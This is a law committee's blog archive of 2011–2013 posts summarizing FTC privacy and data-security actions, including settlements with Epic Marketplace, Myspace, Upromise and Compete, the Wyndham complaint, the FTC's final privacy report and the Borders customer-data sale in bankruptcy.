Main

January 6, 2013

Privacy and Information Security Monthly Update - January 8, 2013

Please join the Privacy and Information Security Committe for our next program on privacy and information security legislative, regulatory, enforcement and litigation developments, covering developments during the month of December 2012.  To register, email Jeanne Welch at jawelch@vorys.comAll pertinent dial-in information will be provided in your confirmation.

 

Please note that the PowerPoint presentation will be available to members only through the Privacy & Information Security Committee website, http://apps.americanbar.org/dch/committee.cfm?com=AT311550.

December 6, 2012

FTC Settles Online "History Sniffing" Charges

The FTC announced yesterday that it has settled charges that the online advertising network Epic Marketplace Inc. used "history sniffing" to secretly and illegally gather data from millions of consumers about their interest in sensitive medical and financial issues. 

Epic's online advertising network - which has a presence on 45,000 websites - serves as an intermediary between online content publishers and advertisers.  Although Epic's privacy policy claimed that it would collect information only about consumers' visits to sites within its network, according to the FTC complaint this was not in fact the case.  Instead, the complaint alleges that from March 2010 through August 2011 consumers who visited Epic's network sites received a cookie which tracked consumer site visits outside its ad network, including some sites relating to personal health conditions and finances.  The complaint further alleges that data collected from these cookies enabled Epic to serve targeted ads to these consumers.  The FTC complaint charges that these practices violated 5(a) of the FTC Act by falsely representing to consumers that Epic only collected information on consumers' visits to websites within the Epic network.

The FTC consent order in the matter bars Epic from using history sniffing and requires that it delete and destroy all data collected using it, among other things.  The order was placed on the public record for thirty days.

The FTC announced the settlement on the eve of today's "Future of Comprehensive Data Collection" workshop to explore the practices and privacy implications of comprehensive data collection about consumers' online behavior.

November 28, 2012

Data Brokers: The Feds are Watching YOU

Data brokers are invisible to consumers and unbridled by regulation. The Federal Trade Commission (FTC) has repeatedly emphasized the need for targeted legislation to regulate this industry. In an attempt to bolster self-regulatory efforts, the FTC’s March 2012 privacy report, Protecting Consumer Privacy in an Era of Rapid Change: Recommendations for Businesses and Policymakers, calls on data brokers to post their data collection practices and to provide consumers with choices on what information is being collected and retained. However, self-regulatory efforts have largely failed.

Perhaps until now. The following events may change the regulatory landscape for companies engaging in data mining practices.

Lawmakers Release Information on Data Brokers’ Collection and Use of Consumer Information


On November 8, 2012, a bipartisan group of lawmakers, including Reps. Edward Markey and Joe Barton, Co-Chairmen of the Congressional Bi-Partisan Privacy Caucus, released responses to letters sent last July to nine major data brokerage companies regarding their data mining practices. The results were disconcerting. The companies reported they were collecting consumer data from a variety of sources, including telephone directories, mobile phones, government agencies, financial institutions, social media sites, and consumers themselves. All but one (Acxiom, relevance to be discussed below) rejected the categorization of their business practices as “data brokerage.” And only Acxiom provided information on the number of consumers who requested access to their information in the last two years: 77 out of 190 million consumers from whom data had been mined.

In a joint statement released the same day, lawmakers characterized the companies’ responses as offering “only a glimpse of the practices of an industry that has operated in the shadow for years.” Lawmakers vowed to continue their efforts to learn more about the data brokerage industry and to “push for whatever steps are necessary to make sure Americans know how this industry operates and are granted control over their own information.”

Recall that Acxiom Corporation’s mining practices had been unveiled by the New York Times last June. The Times characterized Acxiom as the world’s largest commercial database on consumers, operating tens of thousands of servers to collect and analyze consumer data on hundreds of million consumers worldwide on trillions of data transactions a year. The article reported that Acxiom and others operate an extremely profitable enterprise, yielding over $77 million per fiscal year, and enjoy a broad customer base of banks, investment services, automakers, department stores, just about any major company looking for insight into its consumers.

FTC Settlement with Online Data Brokerage Company, Compete, Inc.

On October 22, 2012, the FTC announced its proposed settlement with web analytics company Compete, Inc. The FTC alleged the company used web-tracking software to follow the browsing behavior of millions of consumers without disclosing the extent of the information being collected. Compete got unwitting consumers to download the tracking software by, among other things, promising rewards for sharing opinions about products and services on an online forum. Once installed, the tracking component collected information about consumers’ online activity and captured information consumers entered into websites, including consumers’ usernames, passwords, credit card and financial account information, security codes, and Social Security Numbers. Compete then compiled this data to generate consumer reports, which it sold to clients wanting to improve their website traffic and sales. The FTC alleged the company failed to adopt reasonable data security practices and deceived consumers about the amount of personal information that its website would collect, and also charged Compete with deceptive practices for falsely claiming that the data it kept was anonymous. The proposed settlement requires Compete to obtain consumers’ express consent before collecting any data from software downloaded onto consumers’ computers, to delete personal information already collected, and to provide directions for uninstalling its software.

FTC to Host December 2012 Workshop on Data Mining

On December 6, 2012, the FTC will host a public workshop, entitled “The Big Picture: Comprehensive Data Collection,” which will explore the practices and privacy implications of comprehensive data collection. The FTC’s preliminary agenda includes an examination by consumer protection organizations, academics, business and industry representatives, and privacy professionals of the technological landscape related to data mining, its benefits and risks, consumer knowledge and attitude, and the future of comprehensive data collection. The workshop will likely address many of the questions left unanswered by the nine data brokers queried by lawmakers regarding the companies’ data mining practices.

It remains to be seen whether these events will provide enough legislative inertia to promulgate industry-wide change. Until then, data brokers will continue their practice of unfettered commercial data mining of sensitive consumer information.

July 2, 2012

FTC Brings Action against Wyndham Hotels for Failure to Protect Consumers' Personal Information

The Federal Trade Commission (FTC) filed a complaint on June 26 against Wyndham Worldwide Corporation and three of its subsidiaries, alleging failure to maintain reasonable and appropriate data security for consumers’ sensitive personal information. The FTC claims that because of this failure, intruders were able to obtain unauthorized access to the Defendants’ computer networks. This led to fraudulent charges on consumers’ accounts, incurring more than $10.6 million in losses, and the exporting  of credit card account information to a domain registered in Russia.

Defendants Controlled the Hotels’ Computer Systems

Independent hotels operating under a franchise agreement with Wyndham Hotels had to use a property management system designed by Defendants, which stored consumers’ personal information, including payment information. This system was linked to the Wyndham Hotel corporate network, much of it located at a Phoenix, Arizona data center, operated by Wyndham Hotels. Only Defendants had administrator access to control the property management systems of the independent hotels. Defendants also had direct control over the computer networks of the Wyndham-branded hotels managed by one of the Defendants, Hotel Management.

Privacy Policies

Wyndham Worldwide was responsible for creating information security policies for itself and for its subsidiaries, and for overseeing subsidiaries’ information security programs.

Defendants have published privacy policies on their websites since at least 2008, claiming that they will safeguard the customers personally identifiable information “by using standard industry practices,” and that it will “take commercially reasonable efforts to create and maintain “fire walls” and other appropriate safeguards” to protect customers’ information.

Inadequate Data Security Practices

However, the FTC claims that Defendants’ data security practices were inadequate, and thus unnecessarily exposed consumers’ personal data to unauthorized access and theft. Defendants’ security failures led to fraudulent charges on consumers’ accounts.

The FTC alleges such shortcoming as storing credit card information in clear readable text, failure to limit access between the different property management systems, or failure to secure the Defendants’ servers. Also, Defendants did not require the use of complex passwords to access the property management systems, and allowed the use of easily guessed passwords.

The FTC claims that these shortcomings allowed intruders to gain unauthorized access into Wyndham Hotels’ computer networks on three separate occasions, using similar techniques in each of the three occurrences.  After discovering each of the first two breaches, Defendants failed to take appropriate measures to prevent another breach.

Violations of the FTC Act

The representations made by Defendants’ privacy policies were thus inadequate according to the complaint. The FTC alleges that even though Defendants represented to their customers that they had implemented reasonable and appropriate measures to protect their personal information against unauthorized access, they had not in fact implemented these measures, and thus the representations made to the customers were unfair and deceptive and violated the FTC Act. The FTC also claims that this failure to safeguard consumers’ personal information caused or was likely to cause substantial injury to consumers.

 

 

May 24, 2012

Paul Ohm to Join FTC as Senior Advisor on Internet, Privacy, and Mobile Markets

On August 27, Professor Paul Ohm, Associate Professor at the University of Colorado Law School, will join the FTC as a senior policy advisor for consumer protection and competition issues affecting the Internet and mobile markets.  Ohm specializes on topics that include information privacy and cyberlaw issues.  He has authored numerous law review articles and essays that address the impact of technology on consumer privacy and he is a frequent blogger and contributor to FTC roundtables and industry conferences.

Ohm will join the FTC's Office of Policy Planning, which focuses on the development and implementation of long-range competition and consumer protection policy initiatives, and advises staff on cases raising new or complex legal or policy issues.  This will be the second time that Ohm has served the government in a privacy-focused capacity.  He previously served as a federal prosecutor for the U.S. Department of Justice's Computer Crime and Intellectual Property Section.

A press release on Ohm's new role is available here.

May 9, 2012

Federal Trade Commission Announces Privacy Settlement with Myspace

The FTC has reined another tech giant, albeit a waning one, into a settlement agreement over alleged privacy violations. On May 8, the FTC announced a consent decree with Myspace LLC that forbids it from misrepresenting its privacy policies and requires it to institute a comprehensive privacy policy and submit to biennial audits for compliance for twenty years. This is the third settlement that the FTC has achieved with a major tech company in the social networking arena-- the agency reached similarly structured settlement agreements with Google and Facebook last year.

The FTC's Allegations

The FTC's allegations stem from a gap between Myspace's privacy policy and its practices from January 2009 until June 2010. In its policy, Myspace promised that it would not share a user's personally identifiable information (defined as name, email, mailing address, phone number or credit number) without notice and user consent; that its means for delivering customized ads and sharing browsing data with advertisers; and that it complied with the U.S.-E.U. Safe Harbor framework for data protection.

However, when Myspace displayed ads from certain unaffiliated third parties to logged-in users, Myspace provided the advertiser or its affiliate with the viewer's "Friend ID," which is a persistent unique numerical identifier assigned to each Myspace user. This left third parties a few clicks away from accessing a host of other information about the user. For most users, the Friend ID could be used to get the users' full name and any other information designated as public in the users' settings. The public information could then be combined with additional information harvested by the advertiser's tracking cookie and by any other means.

According the FTC, the representations that Myspace made in its privacy policies were thus false and misleading statements and constituted deceptive acts or practices in violation of Section 5 of the FTC Act. The agency also alleged that Myspace misrepresented its compliance with the US-EU Safe Harbor framework: to transfer personal data lawfully from the E.U. to the U.S., companies must self-certify that they meet certain privacy principles about collection and use of uder data, including Notice and Choice. According to the FTC, Myspace also misrepresented its compliance - although it did not make the offending statements about Safe Harbor compliance until December 2010, after the time period of its other deceptive practices.

Settlement Terms

The order forbids Myspace from misrepresenting its privacy practices, including collection, disclosure and third-party sharing, of all "covered information." This includes a user's name, address, e-mail address or chat screen name, phone number, photos and videos, IP address, device ID or other permanent identifier, contact list or physical location. Like the Google and Facebook settlements, the order requires Myspace to establish and maintain a comprehensive privacy program and submit to biennial assessments of its privacy programs by an independent auditor for 20 years. Myspace must also retain a plethora of related documents for five years, including all "widely disseminated statements" about Myspace's privacy practices, complaints or communications with law enforcement about the order, or any documents that call into question Myspace's compliance.

The 20-year timeframe, which has been the standard in FTC's previous privacy consent decrees, has raised some snickers among commentators about Myspace's longevity, given the site's declining market share. Founded in 2003, the site was acquired by News Corp. for $580 million in 2005 and for a while dwarfed Facebook's number of users. However, it was sold to Specific Media for $35 million last year and its number of unique users is less than half of its 2008 peak.

The agreement will be subject to public comment until June 8, after which the Commission will decide whether to make the proposed consent order final.

Links

April 20, 2012

The Federal Trade Commission Publishes its Final Privacy Report (Part II)

This is the second part of a post about the recently published FTC Privacy Report.

Simplified Consumer Choice (Consent)

Some practices do not require choice

Under the Final Framework, companies would not have to provide consumers with a choice if they collect and use data for ‘commonly accepted practices’ (p.36). Instead of defining rigidly what would be considered as being commonly accepted practices, the FTC focus on the interaction between a business and the consumer (p.38). Is the practice “consistent with the context of the transaction or the consumer’s existing relationship with the business, or is [it] required or specifically authorized by law? ” (p. 39).

One may remember that the Telephone Consumer Protection Act has a similar “existing business relation” exception to consent.

However, the six practices originally identified  in the preliminary staff report as those that companies may engage in without offering consumer choice (fulfillment, fraud prevention, internal operations, legal compliance, public purpose, and most first-party marketing) remain useful as guidance as to whether a practical practice would be indeed considered as being commonly accepted.

First party marketing occurs when a company collects customer data and uses it for its own marketing purposes, as opposed to third party marketing, where collected data is sold to third party for their own marketing purposes.  Entities having a first–party relationship with a consumer would not be exempt from providing consumers with choices if it also collects consumer data not consistent with the first-party relationship, such as tracking the consumer across sites (p. 40-41).

The FTC’s final principle on choice is that companies do not need to provide choice before collecting consumer data for practices either consistent with their relationship with the customer or if required by law (p.48).

Companies should give a choice if the practice is inconsistent with the interaction with the consumer 

Such choice should be given “at a time and in a context in which the consumer is making a decision about his or her data” (p. 48).

The FTC still advocates the implementation of a universal, one-stop mechanism for online behavioral tracking (Do Not Track) (p. 52).

A Do Not Track system should include five key principles (p. 53):

1.     It should cover all parties tracking consumers

 

2.     It should be easy to find, understand and use

 

3.     The choices offered should be persistent and should not be overridden

 

4.     It should be comprehensive, effective and enforceable

 

5.     It should allow the consumer to opt out of receiving targeted advertisements , and also allow consumers to opt out of collection of behavioral data for all purposes other than those consistent with the context of the interaction

Express consent would, however, be required at the time and in the context in which the consumer is making its decision if the company is using data in a materially different manner then the one stated when collecting the data, and if it collects sensitive data, such as social security numbers, information about children, or financial and health data.

Large platform providers (ISPS, operating systems, browsers…)

Such entities have access to a very large spectrum of unencrypted consumer data, which would allow them to build very detailed consumer profiles. Indeed, an ISP has access to all of its customer online activity when using that particular connection, raising privacy concerns. The FTC will host a workshop in the second half of 2012 to discuss privacy issues raised by data collection by large platforms.

Transparency

There are several ways companies could increase the transparency of their data practices.

            Privacy Notice

Privacy notices should be:

-          Clearer

-          Shorter

-          More Standardized

However, prescribing a rigid privacy statement format to be used in all sectors is “not appropriate” according to the FTC. Some elements should be standardized, such as format and terminology, in order for consumers to be able to easily compare privacy practices (p. 62).

            Access

Companies should provide reasonable access to the consumer data they maintain, and this access should be proportionate to the sensitivity of the data and the nature of its use (p. 64).

For entities maintaining data solely for marketing purposes, the FTC agrees that the costs of providing consumer a right to access and correct data would likely outweigh the benefits. However, entities should provide consumers with the lists of data categories they keep, and inform them of their right to state that they do not want their data to be used for marketing purposes (p. 65). However, such companies should provide more individualized access to data if possible, citing as an example Yahoo’s Ad Interest Manager, allowing users to opt out of certain advertising categories.

The FTC also noted that companies compiling consumer data to then sell it to other companies, who then use the data in order to make a decision about a particular person’s ability to be offered a job, an insurance rata, or a credit, are subjected to the FCRA. Consumers then have a right to access and correct their information under the FCRA, 15 U.S.C. §§ 1681g-1681h,even if the company compiling the data is not sure of the use it will be make of the data, but “has reason to believe” it will be used for making such decisions (p. 67).

Entities maintaining data for other, non-marketing purposes that fall outside the scope of the FCRA, such as fraud management risk companies, or social networking sites, should use a sliding scale approach. The consumer access to his data would depend on the use being made of it, and of its sensitive character (p. 67).

The FTC supports legislation, such as the Data Accountability and Trust Act, which would give consumers a right to access their data held by data brokers. It also supports the creation by the data broker industry of a centralized web site where data brokers would inform consumers about their data collection practices, and disclose the companies buying this data (p. 69).

The FTC also supports the idea of an “eraser button,” which would allow people to delete the content they have posted online, a right somewhat similar to the right to be forgotten stated by the recent EU Commission Proposal for a new privacy framework (p. 70).

            Consumer Education

Consumers should be better educated about commercial data privacy practices, and this should be done by all stakeholders.

April 18, 2012

The Federal Trade Commission Publishes its Final Privacy Report (Part I)

The Federal Trade Commission (FTC) issued its much-awaited final privacy report, “Protecting Consumer Privacy in an Era of Rapid Change, Recommendations for Businesses and Policymakers” (the Report).

The Report provides companies with self-regulation guidelines, and it calls for businesses collecting consumer data to implement best practices to protect this data. According to the Report,the framework is meant to encourage best practices and is not intended to conflict with requirements of existing laws and regulations” (p.16).

The FTC believes that self-regulation has not yet gone far enough, with the expectation of Do Not Track (p. 11). Yet, the Report also recommends that Congress pass baseline and technologically neutral privacy legislation, as well as data security legislation. Privacy legislation would give businesses clear guidance, and would also serve as a deterrent by providing remedies to aggrieved parties.  The FTC also recommends the passage of legislation targeted at data brokers, which would allow consumers to have access to their personal data held by data brokers.

Scope of the Privacy Framework

The framework would apply to all commercial entities collecting or using consumer data that can be reasonably linked to a specific consumer, computer, or other device.

It would not apply however, to entities collecting only non-sensitive data from fewer than 5,000 consumers a year, if they do not share that data with third parties, thus to avoid an entity out of the scope of the Framework from selling its collected data to a data broker.

As noted by the Report, HR 5777, the Best Practices Act, contained a similar exclusion, for entities collecting information for fewer than 10,000 individuals during any 12-month period, if the data is not sensitive.

The frameworks would, however, apply to both online and offline data. That way data collected by data brokers would be included in its scope. Also, as noted by the FTC, consumer data collection is ‘ubiquitous,’ whether it occurs online and offline, and the privacy concerns these practices raise are similar (p. 17).

The framework would apply to data that is reasonably linkable to a specific consumer, computer, or device (p. 18).

Under the final framework, data would not be considered as “reasonably linkable to a particular consumer or device” if a company implements three signification protections for that data (p. 21):

-          Taking reasonable measures to ensure that the data is de-identified

-          Publicly commit to maintain and use the data in a de-identified fashion

-          If making the de-identified data available to third parties, prohibiting by contract that third parties  attempt to re-identify the data

Interestingly, the issue of what is personal data is also debated right now in the European Union EU). Recital 24 of the recent EU Commission data protection proposal hints that IP addresses or cookies do not need to be necessarily considered as personal data, as they need to be combined with unique identifiers and other information to allow identification. In a recently published opinion on the proposal, the Article 29 Working Party stated that personal data needs to be more extensively defined, as being all data related to an identifiable individual, and that IP addresses should thus be considered related to identifiable individuals, especially if processing IP addresses or cookies is done to identify users of the computer.

Privacy by Design

The baseline is that “[c]ompanies should promote consumer privacy throughout their organizations and at every stage of the development of their products and services” (p. 22).

Such Privacy protections include four substantive principles:

-          Data security

-          Reasonable collection limits

-          Sound retention practices

-          Data accuracy

Data Security

The Report notes that the FTC has been enforcing data security obligations under Section 5 of the FTC Act, the FCRA and the GLBA (p. 24) and also notes that several companies have already implemented data security protection measures, such as secure payment card data, browser privacy, or SSL encryption (p.25).

            Reasonable Collection Limit

The FTC believes that companies should limit data collection “to that which is consistent with the context of a particular transaction or the consumer’s relationship with the business, or as required or specifically authorized by law” (p. 27).

Sound Data Retention

Companies should not retain data if it is no longer necessary for the legitimate purpose for which is has collected. The FTC does not, however, set a data retention timetable. Instead, it states that the data retention period can be flexible, and may vary according to the type of data collected and its intended use (p. 29).

Data Accuracy

What companies would have to do in order to ensure the accuracy of the data collected depends on the data’s intended use and whether it is sensitive data or not.

Part II to be posted later this week.

March 14, 2012

Commerce Department Launches Multistakeholder Process for Consumer Privacy Codes of Conduct

In response to the White House's February 23, 2012 release of Consumer Data Privacy in a Networked World:  A Framework for Protecting and Promoting Innovation in a Global Digital Economy ("Framework"), the Commerce Department's National Telecommunications and Information Administration ("NTIA") has issued a request for public comments on the consumer data privacy issues to be addressed through voluntary, yet legally enforceable, codes of conduct that implement the Consumer Privacy Bill of Rights outlined in the Framework.  NTIA is seeking comments from all interested stakeholders, including consumer groups, industry, academia, law enforcement agencies, and international partners.  Comments are due on March 26, 2012.

Interested parties may submit comments on any consumer privacy-related topic, though NTIA's request indicates that the Framework's transparency principles in privacy notices for mobile applications ("apps"), particularly apps that feature location-based services, are among the agency's highest priorities.  Other highlighted areas for comment include cloud computing, online services directed toward teens and children, trusted identity systems, and the use of technologies, such as browser-based cookies, to collect personal data.

NTIA also seeks comment on how the multistakeholder process can be structured to ensure openness, transparency, and consensus-building among a diverse group of interested parties.  These comments represent the initial step of a process aimed at developing voluntary codes of conduct that will be enforced by the Federal Trade Commission.

 

 

March 1, 2012

FTC to Host Workshop on Advertising Disclosures Online and in Mobile Media May 30

Yesterday the Federal Trade Commission announced that it will host a day long workshop open to the public on May 30 to explore whether new guidance is needed for advertising disclosures made both online and in mobile media.  The workshop will address the Dot Com Disclosures and how potential revisions could illustrate clear and conspicuous disclosures in the online and mobile advertising environment.  The FTC started seeking input on how to revise the Dot Com Disclosures to account for changes in technology since the guidance was originally issued last year.  

Topics to be addressed include:

- How can effective disclosures be made in social media and on mobile devices, especially when space is limited for disclosures? 

- When can disclosures provided separately from an initial advertisement be considered adequate?

- What are available options when consumers use devices that do not allow downloading or printing terms of an agreement?

- How can short, effective and accessible privacy disclosures be made on mobile devices?

The FTC also seeks suggestions of topics of discussion and original research.  Requests and recommendations can be sent to dotcomdisclosuresworkshop@ftc.gov.  Additional information is available here.

February 17, 2012

The FTC Publishes a Staff Report on Mobile Apps for Children and Privacy

The Federal Trade Commission (FTC) just released a Staff Report (the Report) titled ‘Mobile Apps for Kids: Current Privacy Disclosures Are Disappointing.

 

Mobile Applications (Apps) are getting increasingly popular among children and teenagers, even very young. Indeed, the Report found out that 11% of the apps sold by Apple have toddlers as their intended audience (Report p. 6). Apps geared to children are often either free or inexpensive, which makes them easy to purchase, even on a pocket-money budget (Report p. 7-8).

As such, according to the Report, these apps seem to be intended for children’s use, and some may even be “directed to children” within the meaning of the Children’s Online Privacy Protection Act (COPPA) and the FTC’s implementing Rule (the Rule). The Rule defines what is a “[w]ebsite or online service directed to children”) at 16 C.F.R. § 312.2. Under COPPA and the Rule, operators of online services directed to children under age 13 of age must provide notice and obtain parental consent before collecting children’s personal information. This includes apps. Yet, the FTC staff was unable, in most instances, to find out whether an app collected any data, or, if it did, the type of data collected, the purpose for collecting it, and who collected or obtained access to such data (Report p. 10).

 

‘The mobile app market place is growing at a tremendous speed, and many consumer protections, including privacy and privacy disclosures, have not kept pace with this development’ (Report p.3)

 

Downloading an app on a smart phone may an impact on children’s privacy, as apps are able to gather personal information such as the geolocation of the user, her phone number or a list of contacts, and this, without her parent’s knowledge. Indeed, if app stores and operating systems provide rating systems and controls which allow parents to restrict access to mobile content and features, and even to limit data collection, they do not provide information about which data is collected and whether it is shared. (Report, p. 15)

 

The Report concludes by recommending that app stores, app developers, and third parties providing services within apps, increase their efforts to provide parents with “clear, concise and timely information” about apps download by children. Parents would then be able to know, before downloading an app, what data will be collected, how it will be used, and who will obtain access to this data (Report p. 17). This should be done by using “simple and short disclosures or icons that are easy to find and understand on the small screen of a mobile device.” (Report p. 3)

 

One remembers that United States of America v. W3 Innovations, LLC, in August 2011, was the first FTC case involving mobile applications.

 

February 13, 2012

EPIC is Suing the FTC to Compel Enforcement of Google Buzz Consent Order

The Electronic Privacy Information Center (EPIC) is suing the Federal Trade Commission (FTC) in order to compel the federal agency to enforce the October 2011 Google Buzz consent order, In the Matter of Google, Inc., FTC File No. 102 3136, which was issued following a complaint filed by EPIC with the FTC in February 2010.

 

Pursuant to this consent order, Google may not misrepresent the extent to which it maintains and protects the privacy and confidentiality of the information it collects, including the purposes for which the information is collected, and the extent to which consumers may exercise control over the collection, use, or disclosure of this information. Also, Google must obtain the express affirmative consent of Google users before making any new or additional sharing of information to third parties, which must be identified, and the purpose(s) for sharing the information must be disclosed to Google users. The consent order also requires Google to establish and implement a comprehensive privacy program.

 

Google announced in last January changes in its privacy policy, which will be effective March 1, 2012. Google will then start collecting user data across all the different Google sites, such as Gmail or YouTube, provided that the user logged into her Google account. Ms. Alma Whitten, Google’s Director of Privacy, Product and Engineering, stated that Google can thus provide “a simpler, more intuitive Google experience.” A Google user will have one single Google profile. There is, however, no opt-out available. The new privacy policy states that:

 

We may use the name you provide for your Google Profile across all of the services we offer that require a Google Account. In addition, we may replace past names associated with your Google Account so that you are represented consistently across all our services. If other users already have your email, or other information that identifies you, we may show them your publicly visible Google Profile information, such as your name and photo.”

 

According to EPIC’s complaint, these changes are “in clear violation of [Google] prior commitments to the Federal Trade Commission.” EPIC is arguing that Google violated the Consent Order “by misrepresenting the extent to which it maintains and protects the privacy and confidentiality of [users] information, by misrepresenting the extent to which it complies with the U.S.-EU Safe Harbor Framework… [and] by failing to obtain affirmative consent from users prior to sharing their information with third parties.

 

Indeed, the European Union (EU) is also concerned by these changes. The Article 29 Working Party sent a letter to Google on February 2, to inform the California company that it will “check the possible consequences for the protection of the personal data of [E.U. Member States ]citizensof these changes. Google answered to the Commission Nationale de l’Informatique et des Libertés (CNIL), France’s Data Protection Authority, in charge of coordinating the enquiry into Google Privacy changes, that changes were made in order to insure that Google’s privacy policy is “simpler and more understandable” and also “to create a better user experience.”

 

Meanwhile, EPIC is arguing that the FTC has a non-discretionary obligation to enforce a final order, yet has not yet taken any action with respect to changes ahead in Google’s privacy policy.

January 10, 2012

FTC Scrutiny of Web Browser Toolbar Signals Continued Online Privacy Enforcement in 2012

A recent FTC settlement underscores that, in 2012, the FTC will continue to hold companies accountable for providing full disclosures about the extent to which their online services collect and transmit personal information. On January 5, 2012, the FTC announced a settlement with Upromise, Inc., a membership service that helps consumers save money for college, over charges that the company misled users about the extent to which it collected and shared their personal information through a “Personalized Offers” feature on a web browser toolbar, and then failed to properly secure the user information that it collected.
 
Upromise provides a service that allows users to contribute to a college savings account by collecting rebates that are acquired when users purchase goods and services from Upromise partner merchants. Upromise provided users with a web browser toolbar that highlighted Upromise’s partner merchants appearing in a user’s search results, thereby enabling users to more easily identify merchants that provide the college-savings rebates.
 
According to the FTC, when users enabled the “Personalized Offers” feature, the toolbar collected and transmitted the names of the websites visited by users, as well as information that users entered into those websites, including search terms, user names and passwords, and financial information. The Commission also alleged that users who downloaded the toolbar were told by Upromise that any personal information collected would be removed before it was transmitted, and that Upromise had security features in place to protect the personal information. The FTC claimed that Upromise’s alleged actions were unfair and deceptive and violated the FTC Act.
 
The FTC settlement bars Upromise from using its web browser toolbar to collect users’ personal information without clearly and conspicuously disclosing the extent of its data collection practices before users download the toolbar. Upromise also must destroy any personal information previously collected through the “Personalized Offers” feature, obtain consumers’ consent before installing or re-enabling its toolbar products, and notify users how to uninstall the toolbars currently residing on their computers. The settlement further bars Upromise from making material misrepresentations about the extent to which it protects the privacy and security of consumers’ personal information, and requires the company to establish a comprehensive information security program that includes biennial independent security audits for the next 20 years.
 

December 28, 2011

FTC Warns ICANN About Domain Name Expansion

The FTC recently sent a detailed 15 page letter to the Internet Corporation for Assigned Names and Numbers (ICANN) expressing concern that the organization's plan to expand the domain name system could leave consumers open to online fraud and undermine law enforcers' ability to track online scammers.  The House Energy and Commerce Committee has also expressed concern about ICANN's expansion plan.

ICANN has overseen the allocation of Internet domain names since 1998.  The organization intends to expand generic top-level domain names (gTLDs) - currently ".com", ".net", and ".org" - to include many new domain names, such as the name of a company or a business category e.g. ".restaurant."  According to the FTC letter, gTLD expansion could create a "dramatically increased opportunity for consumer fraud." In particular, the letter outlines a concern that "the proliferation of existing scams, such as phishing, is likely to become a serious challenge given the infinite opportunities that scam artists will now have at their fingertips.  Fraudsters will be able to register misspellings of businesses, including financial institutions, in each of the new gTLDs, create copycat websites, and obtain sensitive consumer data with relative ease before shutting down the site and launching a new one."  The FTC letter urges ICANN to take additional steps before rolling out new domain names, and suggests that a pilot program be implemented by ICANN before proceeding with a full expansion.

The FTC received support from the 400 member Association of National Advertisers which hoped that the letter would help "convince ICANN that it must stop [the] initiative and build true consensus with the many constituencies that depend upon a responsibly managed Internet domain naming process."

The House Energy and Commerce Committee has also expressed opposition to ICANN's expansion plan.  The House Subcommittee on Communications and Technology held a recent hearing to examine the issue, and the full Committee followed up with a bipartisan letter describing domain name expansion as a "worthy goal", while expressing concern "that there is significant uncertainty in this process for business, non-profit organizations, and consumers."  The letter urges ICANN to delay its plan, which is set to go live on January 12, 2012.

September 29, 2011

Borders’s Sale of Personal Information Approved by Bankruptcy Court

The Wall Street Journal reported this week that Judge Martin Glenn of the U.S. Bankruptcy Court in Manhattan approved on September 26th the $13.9 million sale of Borders’s intellectual property to Barnes & Noble. Intellectual property assets include personal information (PI) that Borders collected from 48 million customers. This PI includes customer’s email addresses, but also records of books and videos they have purchased.

The issue of the privacy rights of Border’s customers was debated during the process. At a September 22 hearing, Judge Glenn had hesitated to approve the sale over concerns about customer’s privacy. The two sides, working with the Consumer Privacy Ombudsman (CPO) appointed by the court overseeing the Borders bankruptcy, agreed to email Border’s customers within a day of the sale's closing to ask them if they wish to opt out of Barnes & Noble’s email list. Records about specific titles bought in the past at Border’s won't be included in the sale.

The CPO had contacted the Federal Trade Commission (FTC) requesting it to provide a written description of its concerns regarding the possible sale of the PI collected by Borders during bankruptcy proceeding.

Bureau of Consumer Protection Director David Vladeck answered in a letter to the CPO on September 14, which was submitted to the court.

Borders and Its Privacy Policies

Selling PI during bankruptcy is regulated by section 363(b) of the Bankruptcy Code, 11 U.S.C. § 363(b), which provides that:  (our emphasis)

(b) (1) The trustee, after notice and a hearing, may use, sell, or lease, other than in the ordinary course of business, property of the estate, except that if the debtor in connection with offering a product or a service discloses to an individual a policy prohibiting the transfer of personally identifiable information about individuals to persons that are not affiliated with the debtor and if such policy is in effect on the date of the commencement of the case, then the trustee may not sell or lease personally identifiable information to any person unless —

(A) such sale or such lease is consistent with such policy; or

(B) after appointment of a consumer privacy ombudsman in accordance with section 332, and after notice and a hearing, the court approves such sale or such lease —

(i) giving due consideration to the facts, circumstances, and conditions of such sale or such lease; and

(ii) finding that no showing was made that such sale or such lease would violate applicable nonbankruptcy law.

Border’s 2006 and 2007 privacy policies had promised customers that the retailer would only disclose to third parties a customer’s email address or other PI if the customer “expressly consents to such disclosure.” The 2008 privacy policy, however, stated that:

Circumstances may arise where for strategic or other business reasons, Borders decides to sell, buy, merge or otherwise reorganize its own or other businesses. Such a transaction may involve the disclosure of personal or other information to prospective or actual purchasers, or receiving it from sellers. It is Borders’ practice to seek appropriate protection for information in these types of transactions. In the event that Borders or all of its assets are acquired in such a transaction, customer information would be one of the transferred assets.”

However, Mr. Vladeck wrote that the FTC “views this provision as applying to business transactions that would allow Borders to continue operating as a going concern and not to the dissolution of the company and piecemeal sale of assets in bankruptcy” and that “[e]ven if the provision were to apply in the event of a sale or divestiture of assets through bankruptcy, Borders represented that it would “seek appropriate protection” for such information.”

Privacy Policies and Unfair Practice

Mr. Vladeck wrote that the FTC was concerned that any sale or transfer of the PI of Borders’ customers “would contravene Borders’ express promise not to disclose such information and could constitute a deceptive or unfair practice.”

Mr. Vladeck ‘s letter noted that the FTC brought cases in the past where it alleged that the failure to adhere to a privacy policy is a deceptive practice under the FTC Act. In one of these cases, FTC v. Toysmart, an online retailer had filed for bankruptcy and then tried to sell its customer’s PI. The FTC alleged that the sharing of PI in connection with an offer for sale violated section 5 of the FTC Act, as the retailer had represented in its privacy policy that such information would never be shared with third parties.

Mr. Vladeck wrote that the “Toysmart settlement is an appropriate model to apply” in the Border’s case. The FTC entered a settlement with Toysmart allowing the transfer of customer information under certain limited circumstances:

1) the buyer had to agree not to sell customer information as a standalone asset, but instead to sell it as part of a larger group of assets, including trademarks and online content;

 2) the buyer had to be an entity that concentrated its business in the family commerce market, involving the areas of education, toys, learning, home and/or instruction;

3) the buyer had to agree to treat the personal information in accordance with the terms of Toysmart’s privacy policy; and

 4) the buyer had to agree to seek affirmative consent before making any changes to the policy that affected information gathered under the Toysmart policy.

Mr. Vladeck concluded his letter by offering these guidelines:

-          Borders agrees not to sell the customer information as a standalone asset;

-          The buyer is engaged in substantially the same lines of business as Borders;

-          The buyer expressly agrees to be bound by and adhere to the terms of Borders’ privacy policy; and

-          The buyer agrees to obtain affirmative consent from consumers for any material changes to the policy that affect information collected under the Borders’ policy.”

